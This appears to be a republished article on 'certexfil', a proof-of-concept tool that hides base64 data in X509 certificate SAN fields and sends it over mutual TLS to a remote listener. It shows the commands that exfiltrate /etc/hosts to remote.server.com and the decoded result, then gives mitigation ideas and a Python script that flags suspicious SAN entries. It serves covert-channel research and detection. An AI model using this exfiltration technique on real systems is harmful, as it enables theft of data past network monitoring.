2025-01-18 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
This article explains how an X509 digital certificate can be used to carry exfiltrated data. It is quite detailed and has some reference value, so interested readers should read on.
Data leakage is a major goal for both insiders and external attackers, so it is worth thinking about how that data actually gets sent out.
I find that most companies have little protection against this (for example, man-in-the-middle proxies and TLS interception), and what protection exists is usually tested pitifully little. But sometimes it can be a challenge.
For work and as a hobby I write a lot of tools around data obfuscation and covert channels, always with the aim of building better security detection and improving response time.
In this article we discuss how to embed data in a custom SSL certificate and deliver it over mTLS to a remote listening service.
This is written as a POC, and it is also my first program in Go.
From TLS to mTLS?
TLS (Transport Layer Security) is a cryptographic protocol that provides communication security between a client and a server. To do this, a certificate authority ("CA") issues a signed certificate to the server, which the server presents to prove its identity to the client. The client checks the certificate and verifies that the signing CA is one it actually trusts.
While TLS primarily authenticates the server, mutual TLS (mTLS) adds client authentication: the client also presents a certificate signed by a trusted CA.
X509 certificate abuse
X509 certificates can be extended with Subject Alternative Names (SAN).
This means we can add literal values at certificate creation time, anything from an email address to an IP address to a DNS name.
Again, you can put anything into a SAN; there is no real validation here, the entry only has to follow the format DNS:(.*).
So, can we hide a piece of our payload in this location, that is, as DNS:base64(content)?
Certexfil
It has three modes:
-ca: create a CA, which is used by both the client and the listener
-listen: start an mTLS listener (it needs the CA files created by -ca)
-payload and -host: inject the payload (file, stdout) into a custom client certificate, then immediately use that certificate to connect to the listening service
The code can be found here: https://github.com/sourcefrenchy/certexfil
Certexfil encrypted payload
I used a simple encoding module to base64 the payload, but at this stage that is not of much use. Obviously I need to do some encryption at some point, or I should rename it to encodepayload :). To do this, I created a Go module, cryptopayload, to encrypt the payload.
The code can be found here: https://github.com/sourcefrenchy/cryptopayload
Usage
Create a CA / server certificate
This creates a ./CERTS directory containing the server_cert.pem and server_key.pem certificates for mTLS (the directory is used by both the client and listening modes):
somewhere$ certexfil -ca -ecdsa-curve P521 -host remote.server.com
Now make sure the certexfil binary and the created ./CERTS directory are on your remote server. Then start listening (default: all interfaces, tcp/8443):
remoteserver$ ./certexfil -listen
Client / compromised host sends payload
In this example we exfiltrate our /etc/hosts file by generating a custom certificate and establishing an mTLS connection to the remote listener, all with the following single command line:
06:52:14 jma@wintermute Go-Workspace → certexfil --host remote.server.com --payload /etc/hosts
2019/05/31 18:52:23 [*] Reading from file..
2019/05/31 18:52:24 [D] Payload (raw) --> 127.0.0.1... (225 bytes)
2019/05/31 18:52:24 [D] Payload (Prepare()) --> raw... (173 bytes)
2019/05/31 18:52:24 [*] Generated custom cert with payload
We can inspect the newly created certificate (client_cert.pem) locally and see the base64 payload added in the SAN field. Let's verify it with openssl:
$ openssl x509 -in ./CERTS/client_cert.pem -text -noout | grep -A 5 "Subject Alternative Name"
            X509v3 Subject Alternative Name:
                DNS:x.io.net, DNS:H4sIAAAAAAAC/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h6LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA=
    Signature Algorithm: ecdsa-with-SHA512
         30:81:88:02:42:01:aa:73:a9:af:03:4f:21:16:dd:62:4a:af:
         59:6b:89:f5:a6:6d:e6:f1:21:40:ff:c8:32:f7:99:4f:d9:c8:
         7f:b3:ac:43:1f:71:09:86:f4:be:7b:af:93:31:e2:fb:ec:e8:
Retrieve the payload on the listening end
After verifying the certificate provided by the client connection, we can retrieve the payload, decode it from the base64 and display it:
○ → ./certexfil --listen
2019/05/31 22:51:01 [*] Starting listener..
2019/05/31 22:52:24 [*] Payload received: H4sIAAAAAAAC/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h6LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA=
2019/05/31 22:52:24 [*] Payload decoded: 127.0.0.1 localhost
127.0.1.1 wintermute
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Limitations
With a large payload the handshake fails: tls: handshake message of length 1399109 bytes exceeds maximum of 65536 bytes.
OpenSSL does not allow certificates larger than 65536 bytes.
TODO: split a large payload across multiple certificates and/or recompile OpenSSL.
Mitigation measures
Assuming you already intercept and analyse SSL traffic, some ideas :)
Detect newly created TLS certificates
Check for certificates with large DNS entries, or check that SAN entries are valid DNS names (for example, with a Bro IDS script)
Configure the man-in-the-middle proxy / firewall properly to block such TLS traffic
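The SAN checks suggested above (large or non-hostname DNS entries) can be prototyped outside an IDS. The following Python is an added example written for this page, not code from certexfil or from the article; it parses the Subject Alternative Name section of `openssl x509 -text -noout` output (the sample below is constructed from the certificate excerpt shown earlier) and flags DNS entries that are not valid RFC 1123 hostnames, are unusually long, or are shaped like a base64 blob. The 64-character length threshold and the 32-character base64 minimum are assumed tuning values, not figures from the article.

```python
import re

# Constructed sample of `openssl x509 -text -noout` output: one benign hostname
# plus one DNS entry whose value is the base64 blob printed in the article.
SAMPLE_OPENSSL_TEXT = """\
        X509v3 Subject Alternative Name:
            DNS:x.io.net, DNS:H4sIAAAAAAAC/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h6LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA=
    Signature Algorithm: ecdsa-with-SHA512
"""

SAN_HEADER = "X509v3 Subject Alternative Name:"
# One RFC 1123 label: 1-63 chars, alphanumerics and hyphens, no leading/trailing hyphen.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
# Base64 alphabet with up to two padding characters.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_san_entries(text):
    """Return the raw 'TYPE:value' entries printed on the line after the SAN header."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.strip() == SAN_HEADER and i + 1 < len(lines):
            return [e.strip() for e in lines[i + 1].split(",") if e.strip()]
    return []


def is_valid_hostname(name):
    """RFC 1123 hostname check; a leading '*.' wildcard label is tolerated."""
    if name.startswith("*."):
        name = name[2:]
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.rstrip(".").split("."))


def looks_like_base64(value, min_len=32):
    """True when the value is long and drawn entirely from the base64 alphabet (assumed threshold)."""
    return len(value) >= min_len and BASE64_RE.match(value) is not None


def audit_san(text, max_dns_len=64):
    """Return [(value, [reasons])] for each DNS SAN entry that trips a check.

    max_dns_len is an assumed tuning value; real hostnames longer than this are rare.
    """
    findings = []
    for entry in extract_san_entries(text):
        kind, _, value = entry.partition(":")
        if kind != "DNS":
            continue  # IP Address:, email: and URI: entries are out of scope here
        reasons = []
        if not is_valid_hostname(value):
            reasons.append("not a valid hostname")
        if len(value) > max_dns_len:
            reasons.append(f"length {len(value)} > {max_dns_len}")
        if looks_like_base64(value):
            reasons.append("base64-shaped value")
        if reasons:
            findings.append((value, reasons))
    return findings


if __name__ == "__main__":
    for value, reasons in audit_san(SAMPLE_OPENSSL_TEXT):
        print(f"SUSPICIOUS SAN DNS:{value[:24]}... -> {', '.join(reasons)}")
```

Feed it the output of `openssl x509 -in <cert> -text -noout` (or the equivalent text an IDS or proxy logs for presented client certificates); a legitimate certificate yields no findings, while the sample above flags the second entry on all three checks.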
That is the whole of the article "How to use X509 digital certificates to achieve data exfiltration". Thank you for reading! We hope the content shared here helps you; for more related knowledge, follow the industry information channel.